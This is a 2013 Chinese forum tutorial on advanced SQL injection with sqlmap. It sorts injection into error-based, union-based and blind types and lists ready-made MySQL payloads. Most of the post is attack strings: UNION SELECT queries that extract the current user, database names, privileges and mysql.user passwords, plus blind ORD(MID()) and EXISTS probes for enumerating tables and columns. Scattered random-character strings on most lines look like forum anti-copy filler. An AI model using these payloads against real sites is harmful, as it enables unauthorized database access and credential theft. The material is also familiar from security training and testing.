找回密码
 立即注册
查看: 2701|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。& U- F) z% m4 ^% K% q3 P, H, W
9 |9 K5 f# b6 \
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
- X7 c7 _* s& z! I
$ l1 N; C% J4 K1 a, |/ y7 ^! R分类标准        分类        备注
/ l' {: V2 i# j" b) j7 F按字段类型        整型注入,字符型注入       
+ J1 _2 c3 ]& |3 ^按出现的位置        get注入,post注入,cookie注入,http header注入        1 E. v4 Z1 |5 y( s' l
然而高级注入是这样的
7 p; U8 c& s& A5 ?, g
3 l( K8 v  i- G5 M) }2 Y3 }: S/ _高级注入分类        条件* C" R. T! Y3 f: M2 f8 t( V3 C
error-based sql        数据库的错误回显可以返回,存在数据库,表结构
& b( h- X* P  o- q' d6 K) ~2 Eunion-based sql        能够使用union,存在数据库,表结构
5 y. b+ i/ ?/ j3 {blind sql        存在注入# P& X$ I' `" V# o* d
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
: w. i2 D" V7 Y4 Z! U; Y% {3 A + t/ D2 q/ a* }  R! _
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
4 t3 U0 a4 d4 B# V! F% Y2 C7 H
3 C" w  O( c' H' y5 \6 P( H, `% ]附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。9 m; R! h3 c: \: w
; A2 G9 [3 l/ i' R6 D. x9 v6 T
这里用mysql说明: q/ D% x1 h6 ?5 j: F! }) I) ^9 Z
) t- j3 ~) Y% k9 U; Q( D. c
e注入坛子里很多了,请看戳我或者再戳我! {* @4 b+ P4 M; o3 R7 d: t4 w
8 ^1 s- o, O1 J( w- F8 u
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的' ]1 L  k* @6 w: |2 k! e) i) C

0 Y) P2 m9 H- V  o) ]9 ?获取当前数据库用户名1 R" V5 |$ V8 w4 @9 x
- O# ]0 [) \& K4 U# B) P
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
3 g5 W8 I3 @: r- hAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
, ^0 F% A' ^, E  X2 W' \L, NULL#: L" u' ]+ u  ]+ S% j% Z6 E. Y
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
" }  b3 T( }, F ! a  E0 E( }; I% D
获取数据库名
+ m) u& Y& h9 a  S2 x
' G7 `: d' G/ S: V- Z$ Y& HUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#- Z: ^( j4 Y! q0 B4 q6 d2 s
获取所有用户名
+ |$ l5 J' o$ Q1 B5 e; f
; J' W' ~1 `- @" [9 XUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
% f4 s5 k+ f6 w8 e  Z查看当前用户权限7 J- M* w; i7 y# j3 X3 x9 s+ J
8 o3 `# R% E; y4 s2 l
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
- Z% q2 |; n1 B尝试获取密码,当然需要有能读mysql数据库的权限; [8 t; l) E# u* W3 Y& N' r& W' f( s2 V
, U; n# K  d6 T! s2 M+ P
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#% S% C; P4 m' Y& v1 a4 }9 V& T
获取表名,limit什么的自己搞啦, n& v- \1 r; ?, r% o8 c, R
3 K. X+ [" u" }! N" Q1 J" P/ p
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
2 [% I1 X* Q* D4 k获取字段名及其类型" `/ y' z% M+ r# e: |
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)## a3 _; j& D+ c' \- |

9 k% `/ H5 a" O6 n- Kb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。. b4 D. T0 w  B2 u
% o" H, p. {8 E5 n! Q4 n" A; l  s
如:5 v3 G, W. C7 |
获取当前用户名- l$ h: A" U$ y) w
, l4 v9 B3 f8 a4 n5 o
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
+ C0 B/ `# ?1 ?+ k; L" z: v# L获取当前数据库
- b5 A- Q( h  B& J" P " j& [; {- _, y1 v! m$ s& i1 X
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
& K  V, a) _( w0 O2 z0 U8 M获取表名
( j! f8 A0 H+ t0 d- I 7 x+ b2 H9 i8 Z5 z) M5 {
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
! j. k2 M. U+ T/ R/ R获取字段名及其类型和爆内容就不说了,改改上面的就可以了。. s/ {. e9 h6 g% _+ f! U9 B
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
6 e( S5 B- y3 y- m) x. u爆表2 ~4 o# [# e1 B# E6 P# ^$ ~, d

, P( P" k- p* K' \  ]AND EXISTS(select * from table)
2 v/ @3 l# v0 ]1 Y: V. s) p& n爆字段
4 R; x2 \: b: U8 `" ?5 h. j' g
  Z, j" K$ g" k. J3 K0 V6 ?2 Q. wAND EXISTS(select pwd from table), @7 N  a/ t8 Q: U
盲注的变化就比较多了,由于篇幅,只是举个例子而已。# a  U+ |3 f3 S, |7 b

' g+ X9 `/ s$ m/ B& E本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
9 \& Y" h5 U- _1 s0 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表